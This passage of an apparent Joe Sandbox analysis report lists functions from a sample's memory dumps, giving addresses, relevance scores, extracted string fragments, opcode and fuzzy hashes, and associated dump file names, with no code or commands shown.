                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8Y=$<$9($[ F:$bbsx$gjen$'
                                                                              • API String ID: 0-1020086844
                                                                              • Opcode ID: 65d546872f297432187b5b5a5e2d7249e56b3a305a610c5fc1d92679ba0f491d
                                                                              • Instruction ID: 1519986a6aacb4f4801a655073f2db61cca36774b82d8618aa3937e4a801f22d
                                                                              • Opcode Fuzzy Hash: 65d546872f297432187b5b5a5e2d7249e56b3a305a610c5fc1d92679ba0f491d
                                                                              • Instruction Fuzzy Hash: 5572E571604B418FC73ACF39C490B16BBE2BF96314B198A6DD4E68B7A2D735E409CB50
                                                                              Function 0033B6E0 Relevance: 7.9, Strings: 6, Instructions: 422COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 21$6$;9$QyFg$m+a)$|/.-
                                                                              • API String ID: 0-3893809079
                                                                              • Opcode ID: b4e657aa01535980581eda9de157db93b281fce7bad5a0bc86366c7baf40fff1
                                                                              • Instruction ID: 05b914ce66b22f22417a242751d6fc3254d76e2bac9d0fcd5fd124764237fb3e
                                                                              • Opcode Fuzzy Hash: b4e657aa01535980581eda9de157db93b281fce7bad5a0bc86366c7baf40fff1
                                                                              • Instruction Fuzzy Hash: C10232B1210B01CFD3368F25D895B97BBF5BB45314F108A2DD6AB8BAA0DB74A445CF90
                                                                              Function 00339DC0 Relevance: 7.9, Strings: 6, Instructions: 399COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: /PUR$8C76D044CA0F3E1063CFCF7E6C45F838$LO$V\^R$W _,$s
                                                                              • API String ID: 0-2765564004
                                                                              • Opcode ID: 905213744aa96d353680a5e62343e31bc3e9f41753faad9e9f38c48aebea7a14
                                                                              • Instruction ID: 5c30f12f56b60cc34e03a6deb291b64f1745e1b80ae3df6de6d3b5450aa7118a
                                                                              • Opcode Fuzzy Hash: 905213744aa96d353680a5e62343e31bc3e9f41753faad9e9f38c48aebea7a14
                                                                              • Instruction Fuzzy Hash: 26C101B06487808FD714DF65C89576BBBE2EFD1304F18892CE5D18B2A1DB79850ACB92
                                                                              Function 004EEC41 Relevance: 7.9, Strings: 5, Instructions: 1618COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6Nc$;}$=Bxg$?no$G{~
                                                                              • API String ID: 0-1899548723
                                                                              • Opcode ID: 99c9dedcda1af415f2d33eda28585887db783b06d1c23558fa0185616de28489
                                                                              • Instruction ID: b085ad3fc4fbec3cb61130a2378ee9644cbc4f198c197e65e82058a133c2fe13
                                                                              • Opcode Fuzzy Hash: 99c9dedcda1af415f2d33eda28585887db783b06d1c23558fa0185616de28489
                                                                              • Instruction Fuzzy Hash: 88B219F360C204AFE304AE2DEC8567AFBE9EF94720F1A453DEAC583744E63558058697
                                                                              Function 0033B220 Relevance: 7.9, Strings: 6, Instructions: 360COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: *$Bi$KQ$LC$US$]/[
                                                                              • API String ID: 0-74086816
                                                                              • Opcode ID: bf88b93114b812cc84e812c5bf42b78c9d1a8f4a7b393f9ab719439722f83b3d
                                                                              • Instruction ID: 336bd5876194023427a55a8af4207b1dc57359874f9d599859f45bb7af6461a5
                                                                              • Opcode Fuzzy Hash: bf88b93114b812cc84e812c5bf42b78c9d1a8f4a7b393f9ab719439722f83b3d
                                                                              • Instruction Fuzzy Hash: 12C121B264C3948BD325CF2594D136FFBE1ABC2744F19892CE5DA4B342DB758806CB92
                                                                              Function 004F8C3F Relevance: 6.6, Strings: 4, Instructions: 1626COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ?X/[$DAE:$p6S$Fc%
                                                                              • API String ID: 0-1456236989
                                                                              • Opcode ID: 022eaf7b2bccb13d7fab4e7c4086fbf18fbaf1f70fe5f6bb5c43dac213b895f3
                                                                              • Instruction ID: 5cd47767517dd2949925d7b9e4621b363582c3868b38edd641f9dc70d506a73a
                                                                              • Opcode Fuzzy Hash: 022eaf7b2bccb13d7fab4e7c4086fbf18fbaf1f70fe5f6bb5c43dac213b895f3
                                                                              • Instruction Fuzzy Hash: E2B228F3A082049FE3046E2DEC8567ABBE9EF94620F1A453DEAC5C3744E63598058796
                                                                              Function 004F3C2A Relevance: 6.6, Strings: 4, Instructions: 1609COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: EO~u$H-K$_c}$c7
                                                                              • API String ID: 0-1499570543
                                                                              • Opcode ID: 5a8b83870d1d45f0e0061c17f7c9e278036f89cae1961512d16632f73cbbf8bd
                                                                              • Instruction ID: 222e979f143d324c3c65d4face3d1f11329c070ad574ed2f5eaf128a0229c61a
                                                                              • Opcode Fuzzy Hash: 5a8b83870d1d45f0e0061c17f7c9e278036f89cae1961512d16632f73cbbf8bd
                                                                              • Instruction Fuzzy Hash: 90B2D5F3A0C2049FE304AE2DEC8567AF7E9EF94620F16493DEAC4C7744E63558058697
                                                                              Function 00355150 Relevance: 6.4, Strings: 5, Instructions: 105COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 'O"A$P?l1$X[$o7cI$w3k5
                                                                              • API String ID: 0-455523353
                                                                              • Opcode ID: b6ce6a925084d3a51c8481ec5da541918f73f81787d18276be229396cc298032
                                                                              • Instruction ID: 69eea16167fc618ddf41c3caaf4301a446c604a77b07a7beef83c6302111682b
                                                                              • Opcode Fuzzy Hash: b6ce6a925084d3a51c8481ec5da541918f73f81787d18276be229396cc298032
                                                                              • Instruction Fuzzy Hash: 0A31487120C3859BE7348F58EC41FEBB7E8FBC5308F14492DF659CA281E67591068B56
                                                                              Function 00339940 Relevance: 5.4, Strings: 4, Instructions: 405COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8$OMIO$cmj.$x
                                                                              • API String ID: 0-4161743809
                                                                              • Opcode ID: df6f11e26957ede61ae9d584a5c7ad413bf62493011c90b4395774672c3b0b2b
                                                                              • Instruction ID: e3765582309446df4663ff3f613f0c83629e480062e3092f693c5ad8a40866c5
                                                                              • Opcode Fuzzy Hash: df6f11e26957ede61ae9d584a5c7ad413bf62493011c90b4395774672c3b0b2b
                                                                              • Instruction Fuzzy Hash: 09C1E47264C3C18BD3228F2994A035BBFE1AFD7340F094A6DE4D54B392D77A8905CB96
                                                                              Function 004F07D4 Relevance: 5.3, Strings: 3, Instructions: 1596COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %]k$SO{m$a9k
                                                                              • API String ID: 0-4264105539
                                                                              • Opcode ID: 26df7a065763c5e3dee91aa98fc043f42d4a21ca0f16bf7eaf30699335af5b4a
                                                                              • Instruction ID: 2bbcb2b056eec46e0224e85301221883867e3ad5915f462d74ad21bb103c9d39
                                                                              • Opcode Fuzzy Hash: 26df7a065763c5e3dee91aa98fc043f42d4a21ca0f16bf7eaf30699335af5b4a
                                                                              • Instruction Fuzzy Hash: 00B2F4F360C2049FE304AE2DDC8567AFBE9EF94720F1A493DEAC4C7744EA7558018696
                                                                              Function 056C3B3D Relevance: 4.3, Strings: 3, Instructions: 514COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1446145123.00000000056C1000.00000004.00000800.00020000.00000000.sdmp, Offset: 056C1000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_56c1000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: a$a$ror
                                                                              • API String ID: 0-2894684893
                                                                              • Opcode ID: 3f39549349244eb9fb2dc98c78bd5572f21d8c38bc5417e1d6e63f6cd3399fc6
                                                                              • Instruction ID: ac36058b4c03c17510dfa96764fef819eabbfd7b081a469797a8bfac59fc5e3e
                                                                              • Opcode Fuzzy Hash: 3f39549349244eb9fb2dc98c78bd5572f21d8c38bc5417e1d6e63f6cd3399fc6
                                                                              • Instruction Fuzzy Hash: 91029C6655D3C05FD7538B7488A57A13FB0EF13228F1E89DBC4C18F1A3D26A594AC722
                                                                              Function 00334440 Relevance: 4.2, Strings: 3, Instructions: 420COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: )$)$IEND
                                                                              • API String ID: 0-588110143
                                                                              • Opcode ID: 7ebcf696dff9d5faab362ccad4c41f54003e3fe387939189de8bba7254fc2a93
                                                                              • Instruction ID: 755d93df32b20c54df10ccf39cbb15943052867a1ddffce0eb44ca4bf4aa73aa
                                                                              • Opcode Fuzzy Hash: 7ebcf696dff9d5faab362ccad4c41f54003e3fe387939189de8bba7254fc2a93
                                                                              • Instruction Fuzzy Hash: B5F100B1A08701ABE315CF28D89172BBBE4BB85304F14462DF99A9B391D775F814CB82
                                                                              Function 00354EE0 Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: G*$BQ5$Sc
                                                                              • API String ID: 0-3704218044
                                                                              • Opcode ID: 594f857bc6bd7dfeed06389b69f5a74b9210acde42a34cbd38d254fa1153cb0a
                                                                              • Instruction ID: d9fd104a6d4b51eacdde7c282c3c5fbb14a6ad2e6ab6c82b39011d80d5346f63
                                                                              • Opcode Fuzzy Hash: 594f857bc6bd7dfeed06389b69f5a74b9210acde42a34cbd38d254fa1153cb0a
                                                                              • Instruction Fuzzy Hash: 7D51D27660C3409BE324CF24D886B5FBAE5EBC5714F14C92CF5898B291DB75940A8B93
                                                                              Function 00368970 Relevance: 2.8, Strings: 2, Instructions: 264COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 2$n
                                                                              • API String ID: 0-2202813717
                                                                              • Opcode ID: 8d0f1b4f542bc2a1daceeeff30080f2f83204c935534a3797c8568c27c45a7a8
                                                                              • Instruction ID: 704c3d7fd310afcb707d2a530b2866e2d7a6d7c8c3b904b07be04c5a21d3cef4
